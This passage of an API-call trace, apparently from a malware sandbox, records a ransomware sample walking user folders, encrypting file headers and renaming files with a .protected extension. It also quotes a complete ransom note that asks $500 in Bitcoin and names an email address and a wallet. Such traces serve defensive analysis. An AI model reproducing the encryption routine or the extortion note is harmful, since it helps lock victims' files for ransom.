HALPmcxz\\Links\\Downloads.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.protected")) returned 1 [0092.193] FindNextFileW (in: hFindFile=0x47b990, 
lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.193] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Windows") returned -1 [0092.193] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Program Files") returned 1 [0092.193] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Program Files (x86)") returned 1 [0092.193] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="$Recycle.bin") returned 1 [0092.193] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="System Volume Information") returned -1 [0092.193] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 56 [0092.193] StrStrIW (lpFirst="RecentPlaces.lnk", lpSrch=".protected") returned 0x0 [0092.193] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0092.193] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.193] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 56 [0092.240] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".txt") returned 0x0 [0092.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 56 [0092.240] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".rar") returned 0x0 [0092.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") 
returned 56 [0092.241] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".zip") returned 0x0 [0092.241] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x16b, lpOverlapped=0x0) returned 1 [0092.241] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe95, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.241] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x16b, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x16b, lpOverlapped=0x0) returned 1 [0092.241] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.241] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.242] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.242] CloseHandle (hObject=0xb4) returned 1 [0092.242] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.protected") returned 66 [0092.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.protected")) returned 1 [0092.243] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | 
out: lpFindFileData=0x295f190) returned 0 [0092.243] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0092.243] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RESTORE_FILES.txt") returned 57 [0092.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0092.243] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.243] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0092.244] lstrlenA (lpString="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") returned 684 [0092.244] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0092.244] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.244] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0092.244] CloseHandle (hObject=0xa4) returned 1 [0092.244] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.244] lstrcmpiW (lpString1="Local Settings", lpString2="Windows") returned -1 [0092.244] lstrcmpiW (lpString1="Local Settings", lpString2="Program Files") returned -1 [0092.244] lstrcmpiW (lpString1="Local Settings", lpString2="Program Files (x86)") returned -1 [0092.244] lstrcmpiW (lpString1="Local Settings", lpString2="$Recycle.bin") returned 1 [0092.244] lstrcmpiW (lpString1="Local Settings", lpString2="System Volume Information") returned -1 [0092.244] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned 48 [0092.244] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0092.244] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0092.244] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*") returned 50 [0092.244] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.244] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.244] lstrcmpiW (lpString1="Music", lpString2="Windows") returned -1 [0092.244] lstrcmpiW (lpString1="Music", lpString2="Program Files") returned -1 [0092.244] lstrcmpiW (lpString1="Music", lpString2="Program Files (x86)") returned -1 [0092.244] lstrcmpiW (lpString1="Music", lpString2="$Recycle.bin") returned 1 [0092.244] lstrcmpiW (lpString1="Music", lpString2="System Volume Information") returned -1 [0092.245] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned 39 [0092.245] 
lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0092.245] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0092.245] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned 41 [0092.245] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0092.245] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.245] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.245] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.245] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.245] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.245] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\.") returned 41 [0092.245] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.245] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0092.245] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0092.245] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.245] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.245] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.245] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.245] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.245] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.245] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.245] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.245] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\..") returned 42 [0092.245] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.245] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.245] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0092.245] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0092.245] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.245] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.245] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.245] lstrcmpiW (lpString1="5_XXGpiydtgUK-gisk6.mp3", lpString2="Windows") returned -1 [0092.245] lstrcmpiW (lpString1="5_XXGpiydtgUK-gisk6.mp3", lpString2="Program Files") returned -1 [0092.246] lstrcmpiW (lpString1="5_XXGpiydtgUK-gisk6.mp3", lpString2="Program Files (x86)") returned -1 [0092.246] lstrcmpiW (lpString1="5_XXGpiydtgUK-gisk6.mp3", lpString2="$Recycle.bin") returned 1 [0092.246] lstrcmpiW (lpString1="5_XXGpiydtgUK-gisk6.mp3", lpString2="System Volume Information") returned -1 [0092.246] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3") returned 63 [0092.246] StrStrIW (lpFirst="5_XXGpiydtgUK-gisk6.mp3", lpSrch=".protected") returned 0x0 [0092.246] lstrcmpW (lpString1="5_XXGpiydtgUK-gisk6.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.246] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.246] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5_xxgpiydtguk-gisk6.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3") returned 63 [0092.246] StrStrW 
(lpFirst="5_XXGpiydtgUK-gisk6.mp3", lpSrch=".txt") returned 0x0 [0092.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3") returned 63 [0092.246] StrStrW (lpFirst="5_XXGpiydtgUK-gisk6.mp3", lpSrch=".rar") returned 0x0 [0092.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3") returned 63 [0092.246] StrStrW (lpFirst="5_XXGpiydtgUK-gisk6.mp3", lpSrch=".zip") returned 0x0 [0092.246] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f29, lpOverlapped=0x0) returned 1 [0092.247] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffe0d7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.247] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f29, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f29, lpOverlapped=0x0) returned 1 [0092.247] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.247] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.247] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.247] CloseHandle (hObject=0xb4) returned 1 [0092.247] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3.protected") returned 73 [0092.247] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5_xxgpiydtguk-gisk6.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5_xxgpiydtguk-gisk6.mp3.protected")) returned 1 [0092.248] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.248] lstrcmpiW (lpString1="BXLOb.mp3", lpString2="Windows") returned -1 [0092.248] lstrcmpiW (lpString1="BXLOb.mp3", lpString2="Program Files") returned -1 [0092.248] lstrcmpiW (lpString1="BXLOb.mp3", lpString2="Program Files (x86)") returned -1 [0092.248] lstrcmpiW (lpString1="BXLOb.mp3", lpString2="$Recycle.bin") returned 1 [0092.248] lstrcmpiW (lpString1="BXLOb.mp3", lpString2="System Volume Information") returned -1 [0092.248] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3") returned 49 [0092.248] StrStrIW (lpFirst="BXLOb.mp3", lpSrch=".protected") returned 0x0 [0092.248] lstrcmpW (lpString1="BXLOb.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\bxlob.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.248] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3") returned 49 [0092.248] 
StrStrW (lpFirst="BXLOb.mp3", lpSrch=".txt") returned 0x0 [0092.248] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3") returned 49 [0092.248] StrStrW (lpFirst="BXLOb.mp3", lpSrch=".rar") returned 0x0 [0092.248] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3") returned 49 [0092.248] StrStrW (lpFirst="BXLOb.mp3", lpSrch=".zip") returned 0x0 [0092.248] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.249] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.249] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.249] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.249] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.249] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.249] CloseHandle (hObject=0xb4) returned 1 [0092.250] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3.protected") returned 59 [0092.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\music\\bxlob.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\bxlob.mp3.protected")) returned 1 [0092.250] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.250] lstrcmpiW (lpString1="d80C27Uiwq uNp3.wav", lpString2="Windows") returned -1 [0092.250] lstrcmpiW (lpString1="d80C27Uiwq uNp3.wav", lpString2="Program Files") returned -1 [0092.250] lstrcmpiW (lpString1="d80C27Uiwq uNp3.wav", lpString2="Program Files (x86)") returned -1 [0092.250] lstrcmpiW (lpString1="d80C27Uiwq uNp3.wav", lpString2="$Recycle.bin") returned 1 [0092.250] lstrcmpiW (lpString1="d80C27Uiwq uNp3.wav", lpString2="System Volume Information") returned -1 [0092.250] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav") returned 59 [0092.250] StrStrIW (lpFirst="d80C27Uiwq uNp3.wav", lpSrch=".protected") returned 0x0 [0092.250] lstrcmpW (lpString1="d80C27Uiwq uNp3.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.250] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.250] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d80c27uiwq unp3.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav") returned 59 [0092.251] StrStrW (lpFirst="d80C27Uiwq uNp3.wav", 
lpSrch=".txt") returned 0x0 [0092.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav") returned 59 [0092.251] StrStrW (lpFirst="d80C27Uiwq uNp3.wav", lpSrch=".rar") returned 0x0 [0092.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav") returned 59 [0092.251] StrStrW (lpFirst="d80C27Uiwq uNp3.wav", lpSrch=".zip") returned 0x0 [0092.251] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.251] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.251] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.252] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.252] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.252] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.252] CloseHandle (hObject=0xb4) returned 1 [0092.252] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav.protected") returned 69 [0092.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav" 
